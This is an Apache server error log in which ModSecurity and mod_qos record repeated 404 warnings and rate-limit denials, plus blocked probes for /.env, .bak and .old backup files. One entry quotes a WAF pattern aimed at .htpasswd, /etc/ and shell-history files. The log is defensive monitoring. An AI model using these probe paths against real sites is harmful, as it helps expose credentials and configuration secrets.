[Tue May 26 19:54:54.299815 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUQgAAADY"]
[Tue May 26 19:54:54.314358 2026] [security2:error] [pid 86490:tid 86718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNFZMwN0DpLVWo6LHngAAAOc"]
[Tue May 26 19:54:54.315398 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUOgAAAG4"]
[Tue May 26 19:54:54.316382 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUQQAAAGQ"]
[Tue May 26 19:54:54.325459 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUNwAAAEA"]
[Tue May 26 19:54:54.337841 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUOQAAAHw"]
[Tue May 26 19:54:54.338005 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MnwAAAg0"]
[Tue May 26 19:54:54.340380 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUPwAAAD0"]
[Tue May 26 19:54:54.342370 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUPQAAAAo"]
[Tue May 26 19:54:54.343016 2026] [security2:error] [pid 93576:tid 93801] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/kirby/.env"] [unique_id "ahWtNmDRMqfxdEDkoszUdwAAAFk"]
[Tue May 26 19:54:54.364916 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHyQAAAKU"]
[Tue May 26 19:54:54.367851 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUOwAAAG8"]
[Tue May 26 19:54:54.368699 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MsQAAAcA"]
[Tue May 26 19:54:54.373751 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUPAAAADs"]
[Tue May 26 19:54:54.382677 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MsAAAAag"]
[Tue May 26 19:54:54.384380 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MpAAAAb0"]
[Tue May 26 19:54:54.402928 2026] [security2:error] [pid 86490:tid 86675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHywAAALw"]
[Tue May 26 19:54:54.406879 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHuwAAAIg"]
[Tue May 26 19:54:54.408851 2026] [security2:error] [pid 86490:tid 86744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHwgAAAQE"]
[Tue May 26 19:54:54.414278 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNWDRMqfxdEDkoszUXwAAAAE"]
[Tue May 26 19:54:54.415527 2026] [security2:error] [pid 86490:tid 86647] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNFZMwN0DpLVWo6LHpQAAAKA"]
[Tue May 26 19:54:54.416938 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHzAAAAMU"]
[Tue May 26 19:54:54.421091 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHxwAAAOM"]
[Tue May 26 19:54:54.433276 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNWDRMqfxdEDkoszUZwAAAHQ"]
[Tue May 26 19:54:54.439843 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH2QAAALU"]
[Tue May 26 19:54:54.450902 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHzgAAALQ"]
[Tue May 26 19:54:54.510845 2026] [security2:error] [pid 93576:tid 93770] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/old/settings.bak"] [unique_id "ahWtNmDRMqfxdEDkoszUkAAAADo"]
[Tue May 26 19:54:54.576983 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LIRgAAAOc
[Tue May 26 19:54:54.577449 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LIRwAAAK0
[Tue May 26 19:54:54.579479 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LISQAAAP8
[Tue May 26 19:54:54.587021 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LITAAAAIs
[Tue May 26 19:54:54.592937 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LITwAAAMg
[Tue May 26 19:54:54.593684 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIUAAAAKk
[Tue May 26 19:54:54.600597 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LIUwAAAIg
[Tue May 26 19:54:54.605944 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNlZMwN0DpLVWo6LIVwAAAKc
[Tue May 26 19:54:54.722759 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M8QAAAa8
[Tue May 26 19:54:54.726969 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNmDRMqfxdEDkoszUmQAAAHg
[Tue May 26 19:54:54.727996 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M8gAAAco
[Tue May 26 19:54:54.728911 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M8wAAAeg
[Tue May 26 19:54:54.732679 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M9AAAAa4
[Tue May 26 19:54:54.741497 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M9QAAAbw
[Tue May 26 19:54:54.746281 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIWwAAALo
[Tue May 26 19:54:54.746586 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIXAAAAJ4
[Tue May 26 19:54:54.755908 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:60166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIXQAAAI8
[Tue May 26 19:54:54.757988 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIXgAAALU
[Tue May 26 19:54:54.850891 2026] [security2:error] [pid 93576:tid 93792] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/about.php.old"] [unique_id "ahWtNmDRMqfxdEDkoszUmgAAAFA"]
[Tue May 26 19:54:54.875322 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M9gAAAak
[Tue May 26 19:54:54.876129 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNmDRMqfxdEDkoszUmwAAAH4
[Tue May 26 19:54:54.881038 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M9wAAAZ0
[Tue May 26 19:54:54.884669 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M-QAAAZQ
[Tue May 26 19:54:54.884877 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M-AAAAZc
[Tue May 26 19:54:54.895489 2026] [security2:error] [pid 93576:tid 93813] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUiQAAAGU"]
[Tue May 26 19:54:54.896002 2026] [qos:error] [pid 93868:tid 94381] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25M-gAAAgo
[Tue May 26 19:54:54.898851 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIXwAAAM8
[Tue May 26 19:54:54.900366 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIYAAAAMk
[Tue May 26 19:54:54.914800 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:60166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIYwAAAQM
[Tue May 26 19:54:54.915171 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIZAAAAK8
[Tue May 26 19:54:55.024890 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN2DRMqfxdEDkoszUnQAAAAg
[Tue May 26 19:54:55.027967 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25M-wAAAaQ
[Tue May 26 19:54:55.032512 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25M_AAAAgc
[Tue May 26 19:54:55.036111 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25M_QAAAZ8
[Tue May 26 19:54:55.038343 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25M_gAAAaw
[Tue May 26 19:54:55.051460 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN1ZMwN0DpLVWo6LIZgAAAM0
[Tue May 26 19:54:55.052208 2026] [qos:error] [pid 93868:tid 94321] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25M_wAAAc4
[Tue May 26 19:54:55.055216 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN1ZMwN0DpLVWo6LIZwAAAK0
[Tue May 26 19:54:55.065995 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN1ZMwN0DpLVWo6LIaAAAAP8
[Tue May 26 19:54:55.068913 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:60166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN1ZMwN0DpLVWo6LIaQAAALc
[Tue May 26 19:54:55.185730 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN2DRMqfxdEDkoszUngAAAD8
[Tue May 26 19:54:55.188991 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25NAAAAAaE
[Tue May 26 19:54:55.191221 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25NAgAAAZE
[Tue May 26 19:54:55.191548 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25NAQAAAdw
[Tue May 26 19:54:55.194384 2026] [qos:error] [pid 93868:tid 94345] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25NAwAAAeY
[Tue May 26 19:54:55.205270 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN1ZMwN0DpLVWo6LIagAAAIs
[Tue May 26 19:54:55.205783 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtN0qK9k_ZUB2Vp25NBAAAAZs
[Tue May 26 19:54:55.276122 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNWDRMqfxdEDkoszUZAAAAAY"]
[Tue May 26 19:54:55.278449 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MtwAAAfk"]
[Tue May 26 19:54:55.281204 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LHygAAAPA"]
[Tue May 26 19:54:55.288164 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MrwAAAdc"]
[Tue May 26 19:54:55.301078 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MtgAAAbY"]
[Tue May 26 19:54:55.302350 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MugAAAgg"]
[Tue May 26 19:54:55.302518 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH0AAAAI0"]
[Tue May 26 19:54:55.306908 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH2wAAAKY"]
[Tue May 26 19:54:55.309885 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH3AAAAKI"]
[Tue May 26 19:54:55.311695 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH2gAAAO4"]
[Tue May 26 19:54:55.313898 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNWDRMqfxdEDkoszUbQAAAGg"]
[Tue May 26 19:54:55.314097 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH6wAAANI"]
